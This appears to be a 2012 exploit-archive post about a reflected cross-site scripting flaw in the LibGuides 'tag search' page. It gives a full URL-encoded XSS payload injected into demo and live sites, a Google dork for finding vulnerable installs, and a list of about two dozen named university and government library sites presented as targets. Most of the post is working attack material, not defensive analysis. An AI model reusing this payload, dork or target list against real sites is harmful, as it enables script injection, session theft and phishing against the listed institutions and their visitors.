LibGuides suffers from a cross site scripting vulnerability.
4985e190d49324e53c6fd278eb3ddb1f516c44031167e7402aa76e7f4f366db9
# Exploit Title: LibGuides "tag search" Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/libguides/
# Google Dorks: inurl:searchtags.php?iid= or intext:Powered by Springshare
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/libguides-tag-search-cross-site.html
..................................................................
Well, we have xss in tag search:
Our xss code:
http://codepad.org/LqL68vIQ
http://demo.libguides.com/searchtags.php?iid=1&gid=0&tag=[our xss]
Demo:
http://demo.libguides.com/searchtags.php?iid=1&gid=0&tag=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://3.bp.blogspot.com/-XAKGO9fyl9M/Ty_1uQpsQWI/AAAAAAAAAaY/hUyfAjc-jQM/s1600/1a.JPG
http://natolibguides.info/searchtags.php?iid=&tag=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://3.bp.blogspot.com/-egb8DXmjslE/Ty_11T58uzI/AAAAAAAAAak/g8TK9A238Tc/s1600/1b.JPG
A lot of .edu,org,etc.. sites vuln to xss:
inurl:searchtags.php?iid= site:edu
http://infoguides.gmu.edu/searchtags.php?iid=&tag=
http://libguides.sbuniv.edu/searchtags.php?iid=&tag=
http://libguides.cabq.gov/searchtags.php?iid=&tag=
http://libguides.metro.org/searchtags.php?iid=&tag=
http://guides.lib.washington.edu/searchtags.php?iid=&tag=
http://libguides.bc.edu/searchtags.php?iid=&tag=
http://guides.lib.uchicago.edu/searchtags.php?iid=&tag=
http://libguides.unm.edu/searchtags.php?iid=237&tag=
http://guides.lib.uiowa.edu/searchtags.php?iid=&tag=
http://researchguides.library.wisc.edu/searchtags.php?iid=&tag=
http://guides.library.duke.edu/searchtags.php?iid=&tag=
http://guides.hcl.harvard.edu/searchtags.php?iid=&tag=
http://subjectguides.library.american.edu/searchtags.php?iid=&tag=
http://libguides.uwlax.edu/searchtags.php?iid=&tag=
http://libguides.sit.edu/searchtags.php?iid=&tag=
http://libguides.princeton.edu/searchtags.php?iid=&tag=
http://legalresearch.usfca.edu/searchtags.php?iid=&tag=
http://libguides.hcc.hawaii.edu/searchtags.php?iid=&tag=
http://researchguides.case.edu/searchtags.php?iid=&tag=
http://guides.lib.virginia.edu/searchtags.php?iid=&tag=
http://guides.library.manoa.hawaii.edu/searchtags.php?iid=&tag=
http://libguides.mit.edu/searchtags.php?iid=148&tag=
http://libguides.miami.edu/searchtags.php?iid=155&tag=
http://libguides.olympic.edu/searchtags.php?iid=&tag=
http://libguides.bodleian.ox.ac.uk/searchtags.php?iid=&tag=
http://guides.slsa.sa.gov.au/searchtags.php?iid=&tag=
..................................................................
InSecurity.Ro
Because we care, we're security aware!